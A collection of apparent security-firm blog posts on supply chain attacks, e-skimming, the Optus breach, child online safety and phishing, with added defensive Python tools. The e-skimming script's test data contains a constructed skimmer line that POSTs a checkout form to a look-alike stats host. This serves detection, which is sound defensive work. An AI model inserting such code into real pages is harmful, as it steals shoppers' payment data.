
Uncovering Potential Cyber Security Blind Spots

Supply chain attacks are an emerging threat that targets software developers and suppliers. The attacker's aim is to gain access to source code, build processes, or update mechanisms so that legitimate applications can be trojanised and used to distribute malware.

How supply chain attacks work

Attackers hunt for unsecured network protocols, unsafe coding practices, and unprotected server infrastructure. They modify source code, plant malware in build tools, or tamper with the update process while the software is being built and released by a trusted source, so the poisoned build is signed and certified like any other. The vendor is usually unaware that its release carries malware, and the malicious code runs without friction, with the same trust and permissions as the legitimate software.

The more popular the application, the larger the pool of victims. In one case, a free file compression utility was poisoned and delivered to customers in a country where it was the top utility app.

Types of supply chain attacks

  • Compromised software build tools or update infrastructure
  • Stolen code-signing certificates, or malicious apps signed with the identity of the development company
  • Compromised specialized code shipped in hardware or firmware components
  • Pre-installed malware on devices (cameras, USB drives, phones, etc.)

What can be done?

“What you don’t know can’t hurt you” is the oft-quoted excuse for not worrying about unknown problems. In practice, an unknown technology footprint creates significant headaches for an organization, so the maxim to live by is the opposite: “What you don’t know can hurt you.”

At an organizational level, it is crucial to know your third parties, the technologies they deploy, and the platforms and hardware underneath them. The Apache Log4j vulnerability is a classic case: many companies did not know what their providers' systems were built on, or whether Log4j was embedded somewhere in their own product.

Some of the best practices for managing supply chain risks are:

  • A comprehensive inventory of all assets in the CIO's organization, including shadow business applications bought directly by sales, marketing, quality, or shop-floor teams for industrial IoT and safety.
  • Identify known third-party risks on an ongoing basis, not only in the primary technology but in the underlying platform or hardware the provider uses, and plan to remediate them. This often leads to technology upgrades with cost implications or product support issues; in such cases, near-term mitigating controls need to be identified.
  • Implement a process for periodic audits of third-party systems to identify vulnerabilities, along with detailed source code review for gaps. Insisting that the provider supply this as part of the procurement process avoids pain later.
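As an added example (not code from the original article or from TSARO Labs), the script below performs the inventory check the bullets above describe: it walks a CycloneDX-style software bill of materials, including components a vendor bundles inside its own product, and flags any that fall in a known-vulnerable version range. The SBOM and the rule table are constructed for illustration; the log4j-core entry reflects Log4Shell (CVE-2021-44228) and the follow-up fixes that ended with release 2.17.1, and a real deployment would pull its ranges from a vulnerability feed rather than a hard-coded dict.

```python
"""Flag SBOM components that fall in known-vulnerable version ranges.

Added example for this article, not TSARO Labs code. SAMPLE_SBOM and
VULNERABLE_RANGES are constructed for illustration.
"""
import json
import re

# (group, name) -> [(introduced_inclusive, fixed_exclusive, note)]
# Illustrative local rule table, not a live vulnerability feed.
VULNERABLE_RANGES = {
    ("org.apache.logging.log4j", "log4j-core"): [
        ("2.0-beta9", "2.17.1",
         "Log4Shell (CVE-2021-44228) and follow-up fixes; upgrade to 2.17.1 or later"),
    ],
}


def parse_version(version):
    """Turn '2.14.1' or '2.0-beta9' into a tuple that sorts correctly for these
    simple cases: numeric parts first (padded to four), then a marker that puts
    a pre-release below the final release with the same numbers."""
    main, _, pre = version.partition("-")
    nums = tuple(int(p) for p in re.findall(r"\d+", main))
    nums = (nums + (0, 0, 0, 0))[:4]
    return nums + ((0, pre) if pre else (1, ""),)


def walk_components(components):
    """Yield every component, descending into nested components so that
    libraries a vendor bundles inside its product are inventoried too."""
    for comp in components:
        yield comp
        yield from walk_components(comp.get("components", []))


def find_vulnerable(sbom):
    """Return a list of findings for components inside a vulnerable range."""
    findings = []
    for comp in walk_components(sbom.get("components", [])):
        key = (comp.get("group", ""), comp.get("name", ""))
        version = comp.get("version", "")
        for introduced, fixed, note in VULNERABLE_RANGES.get(key, []):
            if parse_version(introduced) <= parse_version(version) < parse_version(fixed):
                findings.append({
                    "component": f"{key[0]}:{key[1]}",
                    "version": version,
                    "note": note,
                })
    return findings


def scan_sbom_json(text):
    """Convenience wrapper for an SBOM serialised as JSON text."""
    return find_vulnerable(json.loads(text))


# Constructed SBOM: a purchased vendor portal that bundles its own dependencies
# (the part a buyer rarely sees), plus a library the organization uses directly.
SAMPLE_SBOM = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {
            "type": "application", "group": "com.example", "name": "vendor-portal",
            "version": "3.2.0",
            "components": [
                {"type": "library", "group": "org.apache.logging.log4j",
                 "name": "log4j-core", "version": "2.14.1"},
                {"type": "library", "group": "org.apache.logging.log4j",
                 "name": "log4j-api", "version": "2.14.1"},
            ],
        },
        {"type": "library", "group": "org.apache.logging.log4j",
         "name": "log4j-core", "version": "2.17.1"},
    ],
}

if __name__ == "__main__":
    for finding in find_vulnerable(SAMPLE_SBOM):
        print(f"{finding['component']} {finding['version']}: {finding['note']}")
```

Run against the sample, the only finding is the log4j-core 2.14.1 buried inside the vendor's bundle; the directly managed 2.17.1 copy passes, which is exactly the blind spot the article describes.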

While the above points pertain primarily to how one interacts with third-party providers, there are a few things that one can look at doing from a hygiene perspective.

  • Limit the number of privileged accounts: most attackers go after these accounts because they enable the most damage, so reducing them reduces the overall attack surface.
  • Reduce access to sensitive data: treat sensitive data as your crown jewels. Access should be restricted to a select few, and access requests (successful and unsuccessful) should be monitored, including by location (geofencing).
  • Third-party vendor access: implement tight control over what third-party employees and contractors can access, and manage the full life cycle of that access (granting, periodic review, and revocation when the engagement ends).
  • Control shadow IT purchases: any purchased technology system should go through a standard security check and be added to the overall tracking inventory to avoid surprises.

In summary

The world today runs on technology and is held together by strings of data. Data is the most valuable asset an organization has, and it is constantly at risk.
Millions of people and their data are tied to the weakest link, which may be one small piece of hardware or software in a remote corner, with the potential to bring a company to a standstill. It is high time for organizations and professionals to take security seriously at every endpoint.

Focus on this blind spot and find a way to stay abreast of risks and mitigate them.

How to Have a Safe and Secure Online Shopping Experience

E-Skimming: Online skimming hammers restaurant payment platforms as the attacker base widens

The Internet touches almost all aspects of our daily lives. We are able to shop, bank, connect with family and friends, and handle our medical records all online. These activities require you to provide personally identifiable information (PII) such as your name, date of birth, account numbers, passwords, and location information.

Skimming was once dominated by a few highly trained gangs that methodically selected and attacked their targets, modifying JavaScript on websites to steal customers’ credit card information, frequently for sale on the black market. Today it is a far more diverse group of cybercriminals relying on cheap, widely available, and simple-to-use skimming kits.

WHAT IS IT?

Cybercriminals inject skimming code into the payment card processing pages of e-commerce sites to capture credit card and personally identifiable information and send the stolen data to a domain under their control.

HOW DOES IT WORK?

Skimming code is introduced to payment card processing websites by:

  • Exploiting a vulnerability in the website’s e-commerce platform
  • Gaining access to the victim’s network through a phishing email or brute force of administrative credentials
  • Compromising third-party entities and supply chains by hiding skimming code in the JavaScript loaded by the third-party service onto the victim’s website
  • Cross-site scripting that redirects customers to a malicious domain, where malicious JavaScript captures their information from the checkout page

The malicious code captures credit card data as the end user enters it in real-time. The information is then sent to an Internet-connected server using a domain name controlled by the actor. Subsequently, the collected credit card information is either sold or used to make fraudulent purchases.

WHO IS BEING TARGETED?

Businesses—Any organization that maintains a website collecting payment information or other sensitive user data is at risk of an e-skimming attack. Targeted industries include retail, entertainment, travel, utilities, and third-party vendors (such as those providing online advertising or web analytics). Cybercriminals may also target user and administrative credentials in addition to financial or credit card information.

Consumers—Consumer PII, credit card, and financial data is the primary target of e-skimming. Every year millions of individuals become victims of e-skimming attacks. 

Cybercriminals are evolving their tactics and have also been seen using malicious code that targets user and administrative credentials in addition to customer payment information.

Use case example: Magecart

Magecart is a rapidly growing cybercrime ecosystem made up of dozens of subgroups that specialize in digital credit card theft by skimming online payment forms. The name also refers to the JavaScript skimmer code those groups inject.

Magecart operatives gain direct or indirect access to websites and inject malicious JavaScript that steals data entered into online payment forms, typically on the checkout page.

Sites are breached either directly or indirectly. In the indirect case, third-party code suppliers are the targets of supply chain attacks. Suppliers include companies that integrate with websites to add or improve functionality, as well as cloud resources from which websites pull code, such as Amazon S3 buckets. Because these third-party vendors integrate with thousands of websites, compromising one supplier effectively breaches thousands of sites at once.

WHAT ARE THE WARNING SIGNS?

  • Complaints of fraudulent activity on several customers’ accounts after they made a purchase from the victim company.
  • Traffic from the checkout page to a domain the victim company does not recognize or did not register.
  • Hosted JavaScript that has changed without a corresponding authorized deployment.

WHAT IS THE IMPACT OF AN E-SKIMMING ATTACK?

Loss of Sensitive Customer Information: E-skimming attacks can involve the theft of multiple types of customer information, including credit card data and PII. 

Profit loss: Previous e-skimming attacks have demonstrated that business profits will be impacted negatively due to reputation damage and loss of customer trust.

Regulatory and Compliance Issues: Government and industry regulations, such as the Payment Card Industry Data Security Standard (PCI DSS) and the General Data Protection Regulation (GDPR), can expose businesses to lawsuits and fines when customers are affected by an e-skimming attack.

HOW CAN YOU MINIMIZE RISK?

Attribution is difficult: skimmer code varies widely in complexity, which limits the ability to identify a fixed set of indicators of compromise.

Vulnerable companies should secure websites to prevent malicious code injection. In addition, companies should implement proper network segmentation and segregation to limit network exposure and minimize the lateral movement of cyber criminals.

  1. Perform regular updates to payment software.
  2. Use automated monitoring & inspections.
  3. Deploy and maintain content security policies.
  4. Install patches from payment platform vendors.
  5. Implement code integrity checks.
  6. Keep anti-virus software updated.
  7. Ensure you are PCI DSS compliant.
  8. Monitor and analyze web logs.
  9. Refer to your Incident Response Plan, if applicable.
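Three of the controls above (code integrity checks, content security policies, and monitoring) can be started with a few dozen lines of tooling. The script below is an added example, not code from the original article or from TSARO Labs: it records a Subresource Integrity baseline for the scripts a checkout page ships, reports any script whose content drifts from that baseline (the "JavaScript has been edited" warning sign from the earlier section), emits a Content-Security-Policy that confines script loading and outbound connections to known origins, and triages a CSP violation report to surface the unknown exfiltration domain a skimmer produces (the "new domain" warning sign). The script bodies, origins, tampered line and violation report are all constructed for illustration.

```python
"""SRI baseline, drift detection, CSP generation and CSP-report triage for a
checkout page. Added example for this article, not TSARO Labs code; every
script, origin and report below is constructed for illustration."""
import base64
import hashlib
import json
from urllib.parse import urlparse

# Origins allowed to serve scripts to, or receive connections from, the
# checkout page. Assumed values for the example.
ALLOWED_ORIGINS = ["https://shop.example", "https://js.payments.example"]


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Subresource Integrity value, e.g. 'sha384-<base64 digest>', for a script body."""
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode()}"


def build_baseline(scripts: dict) -> dict:
    """Map script URL -> SRI hash for the scripts a page currently ships."""
    return {url: sri_hash(body) for url, body in scripts.items()}


def detect_drift(baseline: dict, current: dict) -> list:
    """URLs whose content no longer matches the baseline, plus any script that
    appeared without being in the baseline at all."""
    return sorted(url for url, body in current.items()
                  if baseline.get(url) != sri_hash(body))


def csp_header(report_uri: str) -> str:
    """A Content-Security-Policy that limits script sources, outbound
    connections and form posts to ALLOWED_ORIGINS and reports violations."""
    origins = " ".join(ALLOWED_ORIGINS)
    return (f"default-src 'self'; script-src {origins}; connect-src {origins}; "
            f"form-action {origins}; report-uri {report_uri}")


def triage_csp_report(report_json: str) -> dict:
    """Classify one CSP violation report. A blocked script load, connection or
    form post to an origin outside the allowlist is the signature of a
    skimmer shipping card data to attacker infrastructure."""
    report = json.loads(report_json)["csp-report"]
    blocked = report.get("blocked-uri", "")
    directive = (report.get("effective-directive")
                 or report.get("violated-directive") or "unknown").split()[0]
    parsed = urlparse(blocked)
    origin = f"{parsed.scheme}://{parsed.netloc}" if parsed.netloc else blocked
    suspicious = (directive in ("script-src", "connect-src", "form-action")
                  and origin not in ALLOWED_ORIGINS)
    return {"document": report.get("document-uri", ""), "directive": directive,
            "origin": origin, "suspicious": suspicious}


# Constructed: the two scripts the checkout page ships today.
SAMPLE_SCRIPTS = {
    "https://shop.example/static/checkout.js":
        b"document.querySelector('#pay').addEventListener('submit', submitOrder);\n",
    "https://js.payments.example/v1/fields.js":
        b"/* payment provider hosted fields */\n",
}
# Constructed: the same page after a skimmer appended a line to checkout.js
# that posts the whole payment form to a look-alike 'stats' host.
TAMPERED_SCRIPTS = dict(SAMPLE_SCRIPTS)
TAMPERED_SCRIPTS["https://shop.example/static/checkout.js"] += (
    b"fetch('https://cdn-stats.example.net/c',"
    b" {method: 'POST', body: new FormData(document.forms[0])});\n")

# Constructed: the report a browser sends when the CSP above blocks that fetch.
SAMPLE_REPORT = json.dumps({"csp-report": {
    "document-uri": "https://shop.example/checkout",
    "effective-directive": "connect-src",
    "violated-directive": "connect-src https://shop.example https://js.payments.example",
    "blocked-uri": "https://cdn-stats.example.net/c",
}})

if __name__ == "__main__":
    baseline = build_baseline(SAMPLE_SCRIPTS)
    print("drift:", detect_drift(baseline, TAMPERED_SCRIPTS))
    print("CSP:", csp_header("/csp-report"))
    print("report:", triage_csp_report(SAMPLE_REPORT))
```

The SRI values from build_baseline go into the page's script tags as integrity attributes so the browser itself refuses a modified file; detect_drift is the server-side counterpart you run on a schedule against what the CDN is actually serving. The CSP is deliberately strict on connect-src and form-action as well as script-src, because a skimmer that gets past script integrity still has to send the card data somewhere.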

In my view, “Any business must apply data-centric protection to any sensitive data within their ecosystem, including PII, financial, and transactional data, as soon as it enters the environment and keep it protected even as employees work with that data.”

Payment platforms can protect sensitive information while preserving the original data format by tokenizing any PII or transactional data, “making it easier for business applications to support tokenized data within their workflows.” “They should also review their enterprise backup and recovery strategies to ensure that they can recover quickly if hackers gain access to their environment and encrypt their enterprise data.”

Thanks for reading.

Published by: P. Sai Ram
Cyber Security Researcher
Tsarolabs

World’s biggest cybercrime so far

Optus, a leading Australian telecommunications company, recently fell victim to a cyber attack and data breach.

Last Thursday, the company came forward with details of the breach. The attack exposed customer information including names, dates of birth, phone numbers, email addresses, and, for some customers, physical addresses and ID document numbers such as driving licence or passport numbers. Payment details and account passwords were not compromised.

Reportedly, enough information was exposed to open a bank account in a victim's name, and the breach has severely damaged the company.

Optus CEO Kelly Bayer Rosmarin stated that the incident had left the company ‘devastated.’

She said, “As soon as we knew, we took action to block the attack and began an immediate investigation.”

Bayer Rosmarin issued a statement confirming unusual activity on the company's systems and said an investigation into the perpetrator and the purpose of the breach had begun.

The incident has devastated the company. In response, it is strengthening its cyber security, notifying affected customers individually, and offering third-party monitoring services to those at higher risk.

The Australian Cyber Security Centre, the Australian Federal Police, and the Office of the Australian Information Commissioner are working with Optus to identify the culprit, and specific systems have been shut down to prevent further data loss.

The Australian Government has criticized the company for putting data belonging to about 40% of the country’s population at risk, and has again pressed Optus, the country's second largest telecom company, about the aftermath of the breach. Almost 10 million accounts were affected.

The Government has urged the company to accelerate notification of the 10,200 customers whose personal information was exposed in the breach.

Overall, cybercrime is picking up pace across the globe. It is not limited to the big names in each line of business; it is also a serious and growing problem for SMEs.

At TSARO Labs, we believe in providing best-in-class, industry-recognized solutions that protect our customers from ransomware and other cyber attacks.

Please write to us to learn more or to request a cyber security demo.

connect@tsarolabs.com    

Raising DigiSmart Kids

The Internet can be excellent for kids. They can use it to attend online classes, research school reports, communicate with teachers, other kids, family, and friends, and play interactive games.

But online access also comes with risks, such as inappropriate content, cyberbullying, and online criminals and predators. For example, some sites offer prizes to lure children into giving up their email addresses and personal information about themselves and their family members. On social media apps and websites where kids interact, criminals may pose as a child or teen looking to make a new friend. They may prod the child to exchange personal information such as an address or phone number, or encourage the child to call them, which reveals the child's phone number through caller ID. Violent, terrorist-themed video games are also widely available and can disturb young children.

Parents must be aware of what their kids see and hear online, who they meet, and what they share about themselves. Talk with your kids, use tools to protect them, and keep an eye on their activities.

Some introductory security lessons for Parents and Children

Use parental-control options

Online tools let you control your kids’ access to adult material and help protect them from Internet predators. Many Internet service providers (ISPs) provide parental-control options. You can also get software that blocks access to specific sites and restricts personal information from being sent online. Other programs can monitor and track online activity.

Help your child understand the impact of sharing a password

Sharing your password gives others control of your digital footprint. Consider what can happen when someone logs in as you, and how someone else’s actions can affect your digital footprint and you.

What happens when you share your password?

Think about a password you’ve created for some app or device you use. Maybe it was a password to unlock your phone or to log into your favorite game or video app. Have you ever shared a password with someone else? Ok, a lot of us have. But there’s an important reason why you really should not share your passwords.

You have something called a digital footprint. A digital footprint represents you online. It’s what all the things you leave online—likes, comments, your screen name, photos, messages, recordings, etc. add up to and give other people an idea of what you’re like. It affects your reputation and how people think of you. They make guesses, or assumptions, about you based on that footprint you leave. So that’s one thing essential to be aware of when you’re online.

Another thing crucial to know is that when you share your password, you are giving someone else control of your digital footprint—you’re allowing them to help create it and shape how other people think of you. Yikes, right?! Since it’s your footprint, everybody believes you’re the one making it. So if someone with your password does something you don’t like, people will think that was you doing it! That’s why it’s super important not to share your passwords.

For example, let’s say you share your password with a friend on a social media account. While logged in as you, your friend sends a message to someone in your class like, “Can you send me your homework answers?” The next day in class, the student goes to the teacher and says you were trying to cheat on your homework by asking for answers. Then they show your teacher the message your friend sent from your account. Who do you think your teacher will believe? How does this affect your reputation? What else might happen?

Brainstorm possible outcomes together. Examples: the teacher calls home; you lose points on an assignment; your digital footprint shows that you tried to cheat in school; you get into a fight with the friend who sent the message.

Remember, your digital footprint represents you online. So any time you share your password with someone, you give that person control of your digital footprint, which can impact how people see you on the Internet and everywhere else. Let’s explore this idea together.

Help your child to build a strong password.

Do’s

  • Use a different password for each of your important accounts. Use at least eight characters.
  • The longer, the better (as long as you remember it!).
  • Use combinations of letters (uppercase and lowercase), numbers, and symbols. Make your passwords memorable, so you don’t need to write them down, which would be risky.
  • Immediately change your password if you think someone else knows it (besides a parent or guardian).
  • Change your passwords now and then.
  • Always use strong screen locks on your devices. Set your devices to lock automatically if they end up in the wrong hands.
  • Consider using a password manager, such as one built into your browser, to remember your passwords. This way, you can use a unique password for each account and not have to remember them all.

Don’t

  • Don’t use personal information (name, address, email, phone number, Aadhaar number, mother’s maiden name, birth dates, or even a pet’s name) in your password.
  • Don’t use a password that is easy to guess, like your nickname, “chocolate”, the name of your school, your favorite sports team, or a string of numbers (like 123456). And definitely don’t use the word “password”!
  • Don’t share your password with anyone other than your parent or guardian. Never write passwords down where someone can find them.
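The do's and don'ts above can be turned into an automated check. The function below is an added example, not code from the original article or from TSARO Labs: it rejects short passwords, passwords with too few character classes, passwords that contain any piece of the user's personal information (name, birth year, pet's name and so on), passwords built from common words such as "password", and plain sequences like 123456. The weak-word list, the personal-information values and the sample passwords are constructed for illustration.

```python
"""Check a candidate password against the do's and don'ts above.

Added example for this article, not TSARO Labs code. COMMON_WEAK and the
sample inputs are constructed for illustration.
"""
import re

# A few words the article warns against; a real deployment would use a large
# breached-password list instead of this short tuple.
COMMON_WEAK = ("password", "chocolate", "qwerty", "letmein", "welcome")


def is_sequence_or_repeat(password: str) -> bool:
    """True for strings like '123456', 'abcdef', '654321' or 'aaaaaaaa'."""
    if len(password) < 2:
        return False
    if len(set(password)) == 1:
        return True
    steps = {ord(b) - ord(a) for a, b in zip(password, password[1:])}
    return steps in ({1}, {-1})


def personal_tokens(personal_info) -> set:
    """Split each piece of personal info into lowercase alphanumeric tokens of
    three or more characters, so '2011-05-14' contributes '2011' and
    'Rex' contributes 'rex'."""
    tokens = set()
    for item in personal_info:
        for tok in re.findall(r"[A-Za-z0-9]+", str(item)):
            if len(tok) >= 3:
                tokens.add(tok.lower())
    return tokens


def check_password(password: str, personal_info=()) -> list:
    """Return the list of rules the password breaks; an empty list means it passes."""
    problems = []
    lowered = password.lower()
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    classes = sum(bool(re.search(p, password))
                  for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
    if classes < 3:
        problems.append("use at least three of: lowercase, uppercase, digits, symbols")
    hits = sorted(tok for tok in personal_tokens(personal_info) if tok in lowered)
    if hits:
        problems.append("contains personal information: " + ", ".join(hits))
    weak = [w for w in COMMON_WEAK if w in lowered]
    if weak:
        problems.append("contains a common word: " + ", ".join(weak))
    if is_sequence_or_repeat(password):
        problems.append("is a simple sequence or repeated character")
    return problems


if __name__ == "__main__":
    # Constructed: a child's profile and three candidate passwords.
    profile = ["Rahul", "2011-05-14", "Greenfield School", "Rex"]
    for candidate in ("123456", "Rahul2011!", "Tr!cky-M0untain-9"):
        print(candidate, "->", check_password(candidate, profile) or "OK")
```

Note that "Rahul2011!" satisfies length and character-class rules and would pass a naive complexity check; it is rejected only because the checker knows the child's name and birth year, which is the point of the "don't use personal information" rule.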

I hope you find this information helpful. To understand online safety measures for your child, don’t hesitate to reach out to us at connect@tsarolabs.com or neha@tsarolabs.com.

5 Reasons Why Mid- & Small-size Businesses are Affected More by Malware Attacks

We read every day about increasing cyberattacks and the new ways cybercriminals employ to steal data, corrupt systems or gain access to a company’s database. Most of the news that reaches us is about large, renowned companies that have been victims of cybercrime. Malware attacks, including adware, ransomware, trojans, viruses and more, are commonly observed in businesses all around the world. But it is pivotal to understand that while we read about big companies being the victims, mid- and small-size businesses are equally the targets of cybercriminals.

The reason is simple: the data in these companies is often not adequately protected, making it easy for criminals to steal or destroy it. Malware attacks may harm these companies more because of delayed response and weaker defenses, affecting a large part of their resources and infrastructure. Mid- and small-size companies have become easy targets for malware attacks in the past few years.

Knowing and understanding malware helps safeguard organizations from compromise. Here is a short guide to the types of attacks frequently faced by SMEs and MMEs:

1.  Adware

Pop-up or random ads on phones, in emails, or on certain websites may redirect the user to advertising websites, where a cybercriminal may harvest data without consent. Not all ads are legitimate. Awareness and careful browsing can prevent employees from falling for adware.

2. Ransomware:

This attack may come in many forms, but it usually ends with the user (in this case, the organization) paying a ransom to regain access to its own data. Over 90% of ransomware attacks are reported to start with email. Making employees aware of email hygiene, taking regular data backups, and storing those backups on a separate network will reduce the effect of an attack. Strong security suites on all computers, matching international standards, will also help prevent and identify malware attacks.

3. Credential Stealing:

Various types of malware can be used by cybercriminals to steal the credentials of employees and clients. Reuse of the same credentials across multiple platforms multiplies the effect of such an attack. Changing passwords regularly, enforcing multi-factor authentication, and using different credentials on different platforms help secure the company’s data.

Malware attacks can be used to take control of sensitive data, confidential information about the company or financial data. Robust cybersecurity solutions and following standard cyber hygiene will help protect the company and its resources. Our experts can always help you find the solutions and safety you are looking for. Connect with us today!

Also, remember to stay updated; as cybercriminals find new ways to attack our systems, we should adapt similarly to protect them.

Threat Hunt & Safety – Know Your Defenses against Malware

Malware is malicious software that enters your system through an infected website, email attachment, malicious ad or app and is designed to damage, destroy or steal data from your systems. It comes in the form of adware, spyware, trojans, bots, viruses or ransomware. Preventive tools exist that can protect you against malware.

Malware Protection

Businesses use a range of anti-virus, anti-spyware and firewall products to protect against malware. But when the attack tooling is complex and advanced, it can slip past these products. In such cases, multiple layers of security, together with the experts at TSARO Labs, can help you protect your systems and data.

Malware Response

Once malware enters your network, the first step is to detect the breach. The next step is to identify the type of malware and the exact software that breached your system. While anti-virus may handle basic infections, advanced malware attacks need expert intervention.

Cyber-security – A Necessity in Today’s World

The constant rise of technology in the modern world has strengthened people’s connection with cyberspace. From storing sensitive documents and personal information on cloud servers to making transactions through online banking, people’s reliance on the internet knows no bounds. However, this increasing use of cyberspace has opened a Pandora’s box of cybercriminals that pose a serious threat to cyber security.

Cyber security is the process of protecting your sensitive data, networks, systems and hardware from cyber-attacks by applying certain technologies and techniques. Cyber-attacks can happen to anyone, whether you are an average citizen or a large multinational company, and there are many ways in which a cybercriminal can gain access to your data. It has therefore become necessary to make cyber security an integral part of your life.

Following are a few factors that highlight the importance of cyber security:
1. Safeguards Your Cloud Servers: Most businesses today prefer to keep their data on cloud servers because of the ease of access they provide. Such servers contain personal information, bank details etc. and hence are an attractive target for cybercriminals. Cyber security protects these servers from such threats.

2. Helps Maintain Reputation: If you become the victim of a cyber-attack, you lose not only your data or money but also your credibility. Cyber security can help you maintain your reputation by preventing potential attacks.

3. Defends Against Viruses: A computer virus can disrupt your entire online network and bring your business to a standstill in no time. Cyber security measures help defend your systems against virus or malware attacks.

4. Prevents Data Theft: If your sensitive data ends up in the wrong hands, it can be used to steal your money, identity, private information, business secrets etc. Cyber security solutions are necessary to detect and thwart unauthorized access and protect you from any damage.

Cyber security is no longer limited to just antivirus and firewalls in today’s world. There are different elements of cyber security like Application Security, Network Security, Information Security, End-user Security, Operational Security, Cloud Security, Disaster Recovery Planning etc. Each of these elements is unique on its own and caters to a specific area of your infrastructure. However, the end goal of all these elements is to make you impervious to cyber threats and help you recover in no time in case you fall victim to a cyber-attack.

Cyber security is an evolving process because technology is growing rapidly, and so is the never-ending urge of cybercriminals to come up with new ways to steal your data. Keeping your security software up to date is the minimum needed to keep your information safe and confidential.

How to Identify & Avoid Phishing Scams

It’s the end of the month, and your cash reserves are running low. All you need is some money to keep you going till your next salary. During this stressful period, you receive an email or a text message that reads, “Get Instant Loan In 10 Minutes At Just 1% Interest”. You click on it because it looks ‘legitimate’ and because you need money. The corresponding link asks you to fill out your personal/bank details, and you end up doing that. Nothing happens for a few days, and then one day, you get a message that your bank balance has been wiped out!

The above example is a classic case of a Phishing scam, and millions of people around the world have fallen victim to this scam in the past few years. Phishing attacks can be considered cyberattacks from fraudsters where legitimate-looking messages are sent to people to steal their sensitive information. Cybercriminals launch a multitude of these attacks every day, and most of them end up being profitable to them.

Identifying A Phishing Attack

Cybercriminals have grown smart over the years, so it has become quite difficult for a novice to identify a phishing attack. Nowadays, scammers send messages or emails that look exactly like your trusted source or company. If you receive such an email, start by checking whether the greeting is generic or personalized. Fraudulent messages tend to have a generic greeting as they are sent randomly.

Generally, a scammer concocts a short story in order to get you to click on a link or open an attachment. You should be alarmed if a text or mail says:

  • You have won a lottery
  • Your credentials need to be changed
  • You must confirm your password or personal information
  • There is suspicious activity or a log-in attempt
  • Update your payment details, etc.
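The signals listed above (generic greeting, lure phrases, a link whose visible text disagrees with its real destination, a sender domain that is not the brand's) can be scored automatically before a message reaches the reader. The script below is an added example, not code from the original article or from TSARO Labs; the two messages, the brand table, the phrase lists and the two-signal threshold are constructed or assumed for illustration.

```python
"""Score an email for the phishing signals described above: a generic greeting,
lure phrases, link text that disagrees with the real destination, links to bare
IP addresses, and a sender domain that does not belong to the brand the message
claims. Added example for this article, not TSARO Labs code; the messages, the
brand table and the phrase lists are constructed for illustration."""
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

LURE_PHRASES = ("won a lottery", "instant loan", "confirm your password",
                "suspicious activity", "update your payment", "verify your account")
GENERIC_GREETINGS = ("dear customer", "dear user", "dear valued customer",
                     "dear account holder")
# Brand keyword -> the domain that brand really sends from (assumed for the example).
KNOWN_BRANDS = {"examplebank": "examplebank.com"}
IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
HOST_LIKE = re.compile(r"^(https?://)?[\w-]+(\.[\w-]+)+(/\S*)?$")


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host: str) -> str:
    """'login.examplebank.com' -> 'examplebank.com'. Approximation: ignores
    multi-label public suffixes such as co.uk."""
    return ".".join(host.lower().split(".")[-2:])


def analyse(raw_message: str) -> dict:
    """Return the phishing signals found and a verdict (two or more signals)."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    sender = msg.get("From", "")
    sender_domain = parseaddr(sender)[1].rpartition("@")[2].lower()
    part = msg.get_body(preferencelist=("html", "plain"))
    body = part.get_content() if part is not None else ""
    text = " ".join(re.sub(r"<[^>]+>", " ", body).lower().split())  # tags and newlines out
    signals = []
    if any(greeting in text[:300] for greeting in GENERIC_GREETINGS):
        signals.append("generic greeting")
    lures = [p for p in LURE_PHRASES if p in text]
    if lures:
        signals.append("lure phrases: " + ", ".join(lures))
    extractor = LinkExtractor()
    extractor.feed(body)
    for href, shown in extractor.links:
        href_host = urlparse(href).hostname or ""
        if IP_HOST.match(href_host):
            signals.append(f"link to bare IP address {href_host}")
        if HOST_LIKE.match(shown):  # the visible text itself looks like a URL
            shown_host = urlparse(shown if "://" in shown else "http://" + shown).hostname or ""
            if registrable(shown_host) != registrable(href_host):
                signals.append(f"link text shows {shown_host} but goes to {href_host}")
    for brand, real_domain in KNOWN_BRANDS.items():
        if (brand in text or brand in sender.lower()) and registrable(sender_domain) != real_domain:
            signals.append(f"claims to be {brand} but sent from {sender_domain}")
    return {"signals": signals, "likely_phishing": len(signals) >= 2}


# Constructed phishing message modelled on the loan lure described above.
SAMPLE_PHISH = """\
From: ExampleBank Support <alerts@examplebank-secure.net>
To: victim@example.org
Subject: Instant loan approved - action required
Content-Type: text/html; charset=utf-8

<html><body>
<p>Dear customer,</p>
<p>Get an instant loan in 10 minutes at just 1% interest. We noticed suspicious
activity on your account, so please <a href="http://198.51.100.23/verify">confirm your password</a>
at <a href="http://examplebank-secure.net/login">www.examplebank.com</a>.</p>
</body></html>
"""

# Constructed legitimate notification sent from the brand's real domain.
SAMPLE_LEGIT = """\
From: ExampleBank <statements@examplebank.com>
To: victim@example.org
Subject: Your March statement is ready
Content-Type: text/html; charset=utf-8

<html><body><p>Hi Priya,</p><p>Your statement is ready in the app. No action is needed.</p></body></html>
"""

if __name__ == "__main__":
    for name, raw in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, analyse(raw))
```

The link-text check is the one most worth keeping: a message can copy a brand's wording perfectly, but the href behind "www.examplebank.com" still has to point at the attacker's host, and the browser shows that host only on hover.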

How To Avoid This Scam?

1. Think twice before you click: Even though a communication looks trustworthy, think before you proceed. Contact the concerned company or source if required to verify the authenticity of that message.

2. Install Antivirus Software: Such software can be a first line of defence against a phishing scam, as it detects known malicious sites and warns you when you visit one.

3. Use multi-factor authentication: This requires two or more credentials, making it difficult for attackers to log in to your account even if they steal your password.

4. Avoid Entertaining Unsolicited Communication: If you did not start the conversation, do not share personal information or passwords with the sender under any circumstances.

5. Cross-Check Your Accounts: Keep track of the activity on your account and check your bank statements regularly to identify a scam, if any.

